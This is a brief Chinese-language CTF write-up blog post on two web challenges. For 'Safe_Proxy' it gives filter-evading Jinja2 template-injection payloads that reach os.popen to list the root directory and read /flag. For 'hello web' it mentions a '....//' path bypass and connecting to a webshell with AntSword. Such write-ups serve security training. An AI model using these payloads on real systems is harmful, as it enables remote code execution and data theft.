Safe_Proxy
开局源码,貌似不能直接搞
拉到本地直接梭
1 | from flask import Flask, request, render_template_string |
拿payload直接打
1 | code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `ls /` > app.py').read()}} |
1 | code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `cat /flag` > app.py').read()}} |
hello web
看注释看到了一个这个提示
访问后发现,得….//绕过
这么个事儿
它是个🐎啊
蚁剑连接在/run/log/这个里面的其中一个文件夹中有flag
sxweb1明明按道理应该出的,™的一直报500…….5555555…还是菜。。。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Zer0!